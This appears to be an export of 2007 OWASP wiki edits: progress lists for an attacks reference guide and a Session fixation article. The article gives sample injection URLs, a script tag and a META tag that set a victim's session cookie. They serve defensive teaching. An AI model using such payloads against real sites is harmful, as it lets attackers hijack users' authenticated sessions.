* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&diff=23094&oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&action=history history])<br />
<br />
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&diff=23104&oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&action=history history])<br />
<br />
<br />
'''New items'''<br />
** [[Denial_of_Service]]<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Session_Prediction]]<br />
<br />
<br />
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])<br />
<br />
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&diff=22637&oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&action=history history])<br />
<br />
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&diff=22638&oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&action=history history])<br />
<br />
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&diff=22641&oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&action=history history])<br />
<br />
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&diff=22642&oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&action=history history])<br />
<br />
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&diff=22647&oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&action=history history])<br />
<br />
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&diff=22651&oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&action=history history])<br />
<br />
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&diff=22654&oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&action=history history])<br />
<br />
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&diff=22643&oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&action=history history])<br />
<br />
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&diff=22658&oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&action=history history])<br />
<br />
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&diff=22660&oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&action=history history])<br />
<br />
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&diff=22661&oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&action=history history])<br />
<br />
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&diff=22662&oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&action=history history])<br />
<br />
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])<br />
<br />
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&diff=22954&oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&action=history history])<br />
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&diff=22956&oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&action=history history])<br />
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&diff=22957&oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&action=history history])<br />
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&diff=22959&oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&action=history history])<br />
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&diff=22960&oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&action=history history])<br />
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&diff=22961&oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&action=history history])<br />
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&diff=22962&oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&action=history history])<br />
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&diff=22963&oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&action=history history])<br />
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&diff=22965&oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&action=history history])<br />
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&diff=22936&oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&action=history history])<br />
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&diff=22937&oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&action=history history])<br />
<br />
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):<br />
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&action=history history])<br />
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&action=history history])<br />
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&action=history history])</div>Nsravhttps://wiki.owasp.org/index.php?title=Category:Sniffing_Attacks&diff=23147Category:Sniffing Attacks2007-11-06T13:02:54Z<p>Nsrav: New page: category:attack</p>
<hr />
<div>[[category:attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=File:Eavesdropping.jpg&diff=23145File:Eavesdropping.jpg2007-11-06T12:25:17Z<p>Nsrav: </p>
<hr />
<div></div>Nsravhttps://wiki.owasp.org/index.php?title=Session_fixation&diff=23144Session fixation2007-11-06T12:08:23Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
The session fixation is an attack that permits hijack a valid user session. The attack explore a limitation in the way the web application manage the session ID, more specifically the vulnerable web application, when authenticate an user, doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists in inducing a user to authenticate himself with a known session ID, and then hijack the user validated session by the knowledge of the used session ID. So the attacker has to provide a legitimate Web application session ID and try to make the victim browser to use it.<br />
<br />
The session fixation attack is considered a class of session hijacking, but, instead to steal the established session between the client and the Web Server after the user log in. Instead the session fixation attack, fixes an established session on the victim browser so the attack starts before the user log in. <br />
<br />
There are some techniques to execute the attack, it depends on how the Web application deals with session token, below are some of the most common techniques:<br />
<br />
'''• Session token in the URL argument:'''<br />
Session ID is sent to the victim in a hyperlink and the victim have to access the site through the malicious URL.<br />
'''<br />
• Session token in a hidden form field:'''<br />
In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in evil web server or directly in html formatted e-mail.<br />
<br />
'''• Session ID in a cookie:'''<br />
<br />
o Client-side script<br />
<br />
Most of browsers support the execution of client-side scripting, in this case, the aggressor could use attacks of code injection as the XSS attack (Cross-site scripting attack) to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser execute the command become capable to fix values inside of the cookie that it will be used to keep a session between the client and the Web Application.<br />
<br />
o <META> tag<br />
<br />
<META> tag also is considered a code injection attack, however, different of the XSS attack where scripts undesirable can be disabled or deny the execution, the attack using this method becomes much more efficient for the impossibility to disable the processing of these tags in the browsers.<br />
<br />
o HTTP header response<br />
<br />
This method explores the server response to fix the Session ID in the victim browser. Including the parameter Set-Cookie in the HTTP header response, the attacker is capable to insert the value of Session ID in the cookie and sends it to the victim browser.<br />
<br />
== Severity ==<br />
<br />
High <br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium to High<br />
<br />
==Examples ==<br />
===Example 1===<br />
The example below has the intention to explain a simple form the process of the attack and the expected results.<br />
<br />
(1)The attacker has to establish a legitimate connection with the web server which (2) issues a session ID or, the attacker can create a new session with proposed session ID, then, (3) the attacker has to send a link with the established session ID to the victim, she has to click on the link sent from the attacker accessing the site, (4) the Web Server saw that session was already established and a new one need not to be created, (5) the victim provides his credentials to the Web Server, (6) knowing the session ID the attacker can access the user´s account.<br />
<br />
<center><br />
<br />
https://www.owasp.org/images/9/9c/Fixation.jpg<br />
<br />
Figure 1. Simple example of Session Fixation attack.<br />
</center><br />
<br />
<br />
<br />
===Example 2===<br />
Client-side scripting<br />
<br />
The processes for the attack using the execution of scripts in the victim browser are very similar with the example 1, however, in this case, the Session ID does not appear as an argument of the URL, but inside of the cookie, to fix the value of the Session ID in the victim cookie, the attacker could insert a Javascript code in the URL that will be executed in the victim browser.<br />
<br />
<nowiki> http://website.kom/<script>document.cookie=”sessionid=abcd”;</script></nowiki><br />
<br />
===Example 3===<br />
<META> tag<br />
<br />
As well as client-side scripting, the codes injection must be made in the URL that will be sent to the victim.<br />
<br />
<nowiki>http://website.kon/<meta http-equiv=Set-Cookie content=”sessionid=abcd”></nowiki><br />
<br />
===Example 4===<br />
HTTP header response<br />
<br />
The insertion of the value of the SessionID in the cookie manipulating the server response can be made intercepting the packages exchanged between the client and the Web Application inserting the Set-Cookie parameter.<br />
<br />
<center><br />
<br />
https://www.owasp.org/images/e/ed/Fixation2.jpg<br />
<br />
Figure 2. Set-Cookie in the HTTP header response<br />
</center> <br />
<br />
== External References==<br />
<br />
*http://www.acros.si/papers/session_fixation.pdf<br />
*http://en.wikipedia.org/wiki/Session_fixation<br />
*http://www.derkeiler.com/pdf/Mailing-Lists/Securiteam/2002-12/0099.pdf<br />
<br />
==Related Threats==<br />
<br />
[[:Category:Authorization]]<br />
<br />
==Related Attacks==<br />
<br />
* [[XSS Attacks]]<br />
* [[Session hijacking attack]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Session Management Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
*[[Session Fixation Protection]]<br />
<br />
<br />
<br />
[[Category:Session Management]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=File:Fixation2.jpg&diff=23143File:Fixation2.jpg2007-11-06T11:56:06Z<p>Nsrav: </p>
<hr />
<div></div>Nsravhttps://wiki.owasp.org/index.php?title=File:Fixation.jpg&diff=23142File:Fixation.jpg2007-11-06T11:55:41Z<p>Nsrav: </p>
<hr />
<div></div>Nsravhttps://wiki.owasp.org/index.php?title=Category:Spoofing&diff=23128Category:Spoofing2007-11-05T20:36:48Z<p>Nsrav: New page: category:attack</p>
<hr />
<div>[[category:attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Category:Protocol_Manipulation&diff=23127Category:Protocol Manipulation2007-11-05T20:36:15Z<p>Nsrav: New page: category:attack</p>
<hr />
<div>[[category:attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Category:Attack&diff=23126Category:Attack2007-11-05T20:04:40Z<p>Nsrav: /* Work to be done here includes */</p>
<hr />
<div>This category is for tagging common types of application security attacks. <br />
<br />
==What is an attack?==<br />
<br />
Attacks are the techniques that attackers use to exploit the vulnerabilities in applications. Attacks are often confused with vulnerabilities, so please try to be sure that the attack you are describing is something that an attacker would do, rather than a weakness in an application.<br />
<br />
{{Template:PutInCategory}}<br />
<br />
An attack article should include:<br />
* a description of exactly how the attack works<br />
* tools and techniques for performing the attack<br />
* links to related threats, vulnerabilities, and countermeasures<br />
<br />
==Work to be done here includes==<br />
<br />
We're in the process of creating, organizing, and completing the attack articles. If you'd like to help, find some stub articles in this category and fill in the details.<br />
<br />
Creating articles for the following topics:<br />
*Unauthorized Access Attempts<br />
*File location guessing (see [[Guessed or visible temporary file]])<br />
*URL Redirection<br />
* ... make sure the attack is listed for each [[:Category:Vulnerability|vulnerability]]<br />
<br />
Note: many of the items marked vulnerabilities from CLASP and other places are really attacks. Some of the more obvious are:<br />
* [[Log injection]]<br />
* [[Resource exhaustion]]<br />
* [[Reflection injection]]<br />
* [[Reflection attack in an auth protocol]]<br />
<br />
<br />
[[Category:Article Type]]<br />
[[Category:OWASP Honeycomb Project]]</div>Nsravhttps://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&diff=23125SpoC 007 - Attacks Reference Guide - Progress Page2007-11-05T20:02:33Z<p>Nsrav: /* Phase 1 - 100% DONE */</p>
<hr />
<div>[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] <br />
<br />
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]<br />
<br />
<br />
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:<br />
<br />
# Attack list revision and description (60% of the project)<br />
# Attacks categorization (20% of the project)<br />
# Research and describe new attacks (20% of the project)<br />
<br />
Total project status: '''100% Done!'''<br />
<br />
== CheckPoints and Decision ==<br />
<br />
===Phase 1 - 100% DONE ===<br />
* Attack List Revision: '''Done!'''<br />
Total number of items on the Attack Guide: '''89'''!<br />
<br />
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.<br />
<br />
Items considered to removal from the attack list: '''30 items''', as follows:<br />
<br />
**[[API_Abuse]]<br />
**[[Cross_Site_Scripting]]<br />
**[[Cross-Site_Scripting]]<br />
**[[CSRF]]<br />
**[[Internal_software_developer]]<br />
**[[Interpreter_Injection]]<br />
**[[Link_Following]]<br />
**[[Log_forging]]<br />
**[[Logic/time_bomb]]<br />
**[[Macro_symbol]]<br />
**[[Network_amplification]]<br />
**[[One-Click_Attack]]<br />
**[[OS_Injection]]<br />
**[[OS_Command_Injection]]<br />
**[[PRNG_permanent_compromise_attack]]<br />
**[[Reviewing_Code_for_OS_Injection]]<br />
**[[Script_in_IMG_tags]]<br />
**[[Sniffing_application_traffic_attack]]<br />
**[[Template:Attack]]<br />
**[[Unquoted_Search_Path_or_Element]]<br />
**[[Web_problems]]<br />
**[[Wildcard_or_Matching_Element]]<br />
**[[Windows_::DATA_alternate_data_stream]]<br />
**[[Windows_hard_link]]<br />
**[[Windows_MS-DOS_device_names]]<br />
**[[Windows_Path_Link_problems]]<br />
**[[Windows_Shortcut_Following_%28.LNK%29]]<br />
**[[Windows_Virtual_File_problems]]<br />
**[[XSS_Attacks]]<br />
**[[XSRF]]<br />
<br />
* Attacks Description: '''59 of 59 items done'''!<br />
<br />
===Phase 2 - DONE! ===<br />
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. <br />
<br />
The categories defined are:<br />
* [[:Category:Abuse of Functionality]]<br />
* [[:Category:Spoofing]]<br />
* [[:Category:Probabilistic Techniques]]<br />
* [[:Category:Exploitation of Authentication]]<br />
* [[:Category:Resource Depletion]]<br />
* Exploitation of Privilege/Trust<br />
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)<br />
* [[:Category:Data_Structure_Attacks]]<br />
* Data Leakage Attacks<br />
* [[:Category:Resource Manipulation]]<br />
* [[:Category:Protocol Manipulation]]<br />
* Time and State Attacks<br />
<br />
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.<br />
<br />
===Phase 3 - 100% DONE ===<br />
Research and Description of new attacks:<br />
<br />
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]<br />
** [[Buffer_Overflow_via_Environment_Variables]]<br />
** [[Cross_Frame_Scripting]]<br />
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Overflow_Binary_Resource_File]]<br />
** [[Session_Prediction]]<br />
<br />
=== Work Done ===<br />
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file<br />
<br />
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).<br />
<br />
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&diff=23056&oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&action=history history])<br />
<br />
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&diff=23057&oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&action=history history])<br />
<br />
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&diff=23058&oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&action=history history])<br />
<br />
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&diff=23060&oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&action=history history])<br />
<br />
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&diff=23065&oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&action=history history])<br />
<br />
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&diff=23117&oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&action=history history])<br />
<br />
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&diff=23118&oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&action=history history])<br />
<br />
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&diff=23067&oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&action=history history])<br />
<br />
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23075&oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&action=history history])<br />
<br />
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&diff=23077&oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&action=history history history])<br />
<br />
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&diff=23079&oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&action=history history])<br />
<br />
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&diff=23082&oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&action=history history])<br />
<br />
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&diff=23084&oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&action=history history])<br />
<br />
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&diff=23059&oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&action=history history])<br />
<br />
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&diff=23066&oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&action=history history])<br />
<br />
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&diff=23071&oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&action=history history])<br />
<br />
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&diff=23076&oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&action=history history])<br />
<br />
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&diff=23078&oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&action=history history])<br />
<br />
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&diff=23081&oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&action=history history])<br />
<br />
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&diff=23086&oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&action=history history])<br />
<br />
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&diff=23088&oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&action=history history])<br />
<br />
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&diff=23089&oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&action=history history])<br />
<br />
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&diff=23090&oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&action=history history])<br />
<br />
* [[SQL_Injection]] - ([http://www.owasp.org/index.php?title=SQL_Injection&diff=23119&oldid=21964 diff] , [http://www.owasp.org/index.php?title=SQL_Injection&action=history history])<br />
<br />
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&diff=23109&oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&action=history history])<br />
<br />
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&diff=23093&oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&action=history history])<br />
<br />
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&diff=23094&oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&action=history history])<br />
<br />
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&diff=23104&oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&action=history history])<br />
<br />
<br />
'''New items'''<br />
** [[Denial_of_Service]]<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Session_Prediction]]<br />
<br />
<br />
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])<br />
<br />
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&diff=22637&oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&action=history history])<br />
<br />
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&diff=22638&oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&action=history history])<br />
<br />
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&diff=22641&oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&action=history history])<br />
<br />
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&diff=22642&oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&action=history history])<br />
<br />
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&diff=22647&oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&action=history history])<br />
<br />
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&diff=22651&oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&action=history history])<br />
<br />
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&diff=22654&oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&action=history history])<br />
<br />
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&diff=22643&oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&action=history history])<br />
<br />
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&diff=22658&oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&action=history history])<br />
<br />
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&diff=22660&oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&action=history history])<br />
<br />
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&diff=22661&oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&action=history history])<br />
<br />
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&diff=22662&oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&action=history history])<br />
<br />
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])<br />
<br />
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&diff=22954&oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&action=history history])<br />
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&diff=22956&oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&action=history history])<br />
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&diff=22957&oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&action=history history])<br />
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&diff=22959&oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&action=history history])<br />
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&diff=22960&oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&action=history history])<br />
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&diff=22961&oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&action=history history])<br />
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&diff=22962&oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&action=history history])<br />
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&diff=22963&oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&action=history history])<br />
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&diff=22965&oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&action=history history])<br />
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&diff=22936&oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&action=history history])<br />
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&diff=22937&oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&action=history history])<br />
<br />
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):<br />
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&action=history history])<br />
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&action=history history])<br />
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&action=history history])</div>Nsravhttps://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&diff=23124SpoC 007 - Attacks Reference Guide - Progress Page2007-11-05T20:00:57Z<p>Nsrav: </p>
<hr />
<div>[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] <br />
<br />
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]<br />
<br />
<br />
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:<br />
<br />
# Attack list revision and description (60% of the project)<br />
# Attacks categorization (20% of the project)<br />
# Research and describe new attacks (20% of the project)<br />
<br />
Total project status: '''100% Done!'''<br />
<br />
== CheckPoints and Decision ==<br />
<br />
